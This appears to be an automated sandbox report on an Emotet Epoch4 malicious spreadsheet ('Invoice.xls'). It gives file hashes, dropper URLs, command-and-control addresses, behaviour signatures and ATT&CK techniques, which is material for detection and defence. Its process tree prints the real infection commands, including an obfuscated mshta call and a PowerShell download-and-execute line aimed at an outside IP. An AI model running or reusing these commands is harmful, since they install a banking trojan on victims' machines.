emotet | f8ebf8cca5d8d600ab9f9d9e60b495f4776410c77c99e38d4777091b5d1f7c59

General

Target

Invoice.xls
Size

47KB
MD5

3e4821e1a54cdd0b333933a730f0e769
SHA1

35a960b514e8b823a8af74c70323681105a04ccb
SHA256

f8ebf8cca5d8d600ab9f9d9e60b495f4776410c77c99e38d4777091b5d1f7c59
SHA512

0bee5ba3825f001370226013acc73f85e64f834faaa5368c7fa3ba8ea871a266e76b5f08fbbcace96579d556cf4b19c13dbdb224ade5378d0f83959e323df6a8

Score

10^/10

emotet epoch4 banker suricata trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.240.118.168/vvv/ppp/fe.png

Extracted

Family

emotet

Botnet

Epoch4

C2

51.15.4.22:443

173.214.173.220:8080

212.237.5.209:443

192.254.71.210:443

216.158.226.206:443

162.243.175.63:443

212.24.98.99:8080

58.227.42.236:80

45.118.115.99:8080

104.251.214.46:8080

185.157.82.209:8080

46.55.222.11:443

188.40.137.206:8080

81.0.236.90:443

103.75.201.2:443

129.232.188.93:443

195.154.133.20:443

159.8.59.82:8080

79.172.212.216:8080

138.185.72.26:8080

eck1.plain

ecs1.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

CMD.EXE

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4808	4100	CMD.EXE	EXCEL.EXE

suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata
Blocklisted process makes network request 5 IoCs

Processes:

mshta.exepowershell.exerundll32.exe

flow pid process

25 4908 mshta.exe
33 4524 powershell.exe
35 4524 powershell.exe
47 4360 rundll32.exe
49 4360 rundll32.exe
Downloads MZ/PE file
Loads dropped DLL 2 IoCs

Processes:

rundll32.exerundll32.exe

pid process

4288 rundll32.exe
3856 rundll32.exe
Drops file in System32 directory 1 IoCs

Processes:

rundll32.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\Axopzyychh\tpndka.pbi rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

5020 4908 WerFault.exe mshta.exe

flow	pid	process
25	4908	mshta.exe
33	4524	powershell.exe
35	4524	powershell.exe
47	4360	rundll32.exe
49	4360	rundll32.exe

pid	process
4288	rundll32.exe
3856	rundll32.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\Axopzyychh\tpndka.pbi	rundll32.exe

pid	pid_target	process	target process
5020	4908	WerFault.exe	mshta.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4100 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 19 IoCs

Processes:

WerFault.exepowershell.exerundll32.exe

pid	process
5020	WerFault.exe
5020	WerFault.exe
5020	WerFault.exe
5020	WerFault.exe
5020	WerFault.exe
5020	WerFault.exe
5020	WerFault.exe
5020	WerFault.exe
5020	WerFault.exe
5020	WerFault.exe
5020	WerFault.exe
5020	WerFault.exe
5020	WerFault.exe
5020	WerFault.exe
4524	powershell.exe
4524	powershell.exe
4524	powershell.exe
4360	rundll32.exe
4360	rundll32.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

WerFault.exepowershell.exe

description pid process

Token: SeDebugPrivilege 5020 WerFault.exe
Token: SeDebugPrivilege 4524 powershell.exe

description	pid	process
Token: SeDebugPrivilege	5020	WerFault.exe
Token: SeDebugPrivilege	4524	powershell.exe

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

EXCEL.EXE

pid	process
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE
4100	EXCEL.EXE

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

EXCEL.EXECMD.EXEmshta.exepowershell.execmd.exerundll32.exerundll32.exerundll32.exe

description	pid	process	target process
PID 4100 wrote to memory of 4808	4100	EXCEL.EXE	CMD.EXE
PID 4100 wrote to memory of 4808	4100	EXCEL.EXE	CMD.EXE
PID 4808 wrote to memory of 4908	4808	CMD.EXE	mshta.exe
PID 4808 wrote to memory of 4908	4808	CMD.EXE	mshta.exe
PID 4908 wrote to memory of 4524	4908	mshta.exe	powershell.exe
PID 4908 wrote to memory of 4524	4908	mshta.exe	powershell.exe
PID 4524 wrote to memory of 4416	4524	powershell.exe	cmd.exe
PID 4524 wrote to memory of 4416	4524	powershell.exe	cmd.exe
PID 4416 wrote to memory of 4288	4416	cmd.exe	rundll32.exe
PID 4416 wrote to memory of 4288	4416	cmd.exe	rundll32.exe
PID 4416 wrote to memory of 4288	4416	cmd.exe	rundll32.exe
PID 4288 wrote to memory of 3856	4288	rundll32.exe	rundll32.exe
PID 4288 wrote to memory of 3856	4288	rundll32.exe	rundll32.exe
PID 4288 wrote to memory of 3856	4288	rundll32.exe	rundll32.exe
PID 3856 wrote to memory of 3120	3856	rundll32.exe	rundll32.exe
PID 3856 wrote to memory of 3120	3856	rundll32.exe	rundll32.exe
PID 3856 wrote to memory of 3120	3856	rundll32.exe	rundll32.exe
PID 3120 wrote to memory of 4360	3120	rundll32.exe	rundll32.exe
PID 3120 wrote to memory of 4360	3120	rundll32.exe	rundll32.exe
PID 3120 wrote to memory of 4360	3120	rundll32.exe	rundll32.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Invoice.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4100

C:\Windows\SYSTEM32\CMD.EXE
CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4808

C:\Windows\system32\mshta.exe
mshta http://91.240.118.168/vvv/ppp/fe.html
3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:4908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4524

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
5⤵
- Suspicious use of WriteProcessMemory
PID:4416

C:\Windows\SysWow64\rundll32.exe
C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4288

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3856

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Axopzyychh\tpndka.pbi",GyVCZQPGl
8⤵
- Suspicious use of WriteProcessMemory
PID:3120

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Axopzyychh\tpndka.pbi",DllRegisterServer
9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:4360

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4908 -s 1660
4⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5020

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

3

T1082

Query Registry

2

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\QWER.dll
MD5
4be9fda9a2fdb10c36a1ce820b676e7e

SHA1
fd74db40bdbc55c29ec996f32d7b7332088f32b2

SHA256
f5f55f383321f7aa4a973677be3a538c236f0c6eb87b8edc3fbe43433a0f8dc1

SHA512
878ee58f42dd8e2b7c4010bdb3f954b1d537da8bf6448f8963817d395846ebbaf9eca4e61638810aec5d64029a3aa77701f584362bf65fef095de4529a8f88ed

Download Submit
\ProgramData\QWER.dll
MD5
4be9fda9a2fdb10c36a1ce820b676e7e

SHA1
fd74db40bdbc55c29ec996f32d7b7332088f32b2

SHA256
f5f55f383321f7aa4a973677be3a538c236f0c6eb87b8edc3fbe43433a0f8dc1

SHA512
878ee58f42dd8e2b7c4010bdb3f954b1d537da8bf6448f8963817d395846ebbaf9eca4e61638810aec5d64029a3aa77701f584362bf65fef095de4529a8f88ed

Download Submit
\ProgramData\QWER.dll
MD5
4be9fda9a2fdb10c36a1ce820b676e7e

SHA1
fd74db40bdbc55c29ec996f32d7b7332088f32b2

SHA256
f5f55f383321f7aa4a973677be3a538c236f0c6eb87b8edc3fbe43433a0f8dc1

SHA512
878ee58f42dd8e2b7c4010bdb3f954b1d537da8bf6448f8963817d395846ebbaf9eca4e61638810aec5d64029a3aa77701f584362bf65fef095de4529a8f88ed

Download Submit
memory/3856-339-0x0000000004860000-0x0000000004885000-memory.dmp

Filesize
148KB

Download
memory/3856-337-0x0000000004800000-0x0000000004825000-memory.dmp

Filesize
148KB

Download
memory/3856-335-0x00000000047A0000-0x00000000047C5000-memory.dmp

Filesize
148KB

Download
memory/3856-333-0x0000000004630000-0x0000000004655000-memory.dmp

Filesize
148KB

Download
memory/3856-328-0x0000000000250000-0x0000000000275000-memory.dmp

Filesize
148KB

Download
memory/3856-349-0x00000000049D0000-0x00000000049F5000-memory.dmp

Filesize
148KB

Download
memory/4100-385-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmp

Filesize
64KB

Download
memory/4100-386-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmp

Filesize
64KB

Download
memory/4100-115-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmp

Filesize
64KB

Download
memory/4100-387-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmp

Filesize
64KB

Download
memory/4100-388-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmp

Filesize
64KB

Download
memory/4100-129-0x00007FFBCBCE0000-0x00007FFBCBCF0000-memory.dmp

Filesize
64KB

Download
memory/4100-128-0x00007FFBCBCE0000-0x00007FFBCBCF0000-memory.dmp

Filesize
64KB

Download
memory/4100-121-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmp

Filesize
64KB

Download
memory/4100-118-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmp

Filesize
64KB

Download
memory/4100-117-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmp

Filesize
64KB

Download
memory/4100-116-0x00007FFBCE9E0000-0x00007FFBCE9F0000-memory.dmp

Filesize
64KB

Download
memory/4288-325-0x00000000043F1000-0x0000000004412000-memory.dmp

Filesize
132KB

Download
memory/4360-359-0x0000000004A10000-0x0000000004A35000-memory.dmp

Filesize
148KB

Download
memory/4360-357-0x0000000004880000-0x00000000048A5000-memory.dmp

Filesize
148KB

Download
memory/4360-361-0x0000000004A70000-0x0000000004A95000-memory.dmp

Filesize
148KB

Download
memory/4360-363-0x0000000004AD0000-0x0000000004AF5000-memory.dmp

Filesize
148KB

Download
memory/4360-365-0x0000000004C50000-0x0000000004C75000-memory.dmp

Filesize
148KB

Download
memory/4360-367-0x0000000004CB0000-0x0000000004CD5000-memory.dmp

Filesize
148KB

Download
memory/4360-369-0x0000000004D30000-0x0000000004D55000-memory.dmp

Filesize
148KB

Download
memory/4524-318-0x000002A861310000-0x000002A879400000-memory.dmp

Filesize
384.9MB

Download
memory/4524-317-0x000002A861310000-0x000002A879400000-memory.dmp

Filesize
384.9MB

Download
memory/4524-310-0x000002A861310000-0x000002A879400000-memory.dmp

Filesize
384.9MB

Download
memory/4524-305-0x000002A879BF0000-0x000002A879C66000-memory.dmp

Filesize
472KB

Download
memory/4524-294-0x000002A879660000-0x000002A87969C000-memory.dmp

Filesize
240KB

Download
memory/4524-275-0x000002A8793C0000-0x000002A8793E2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads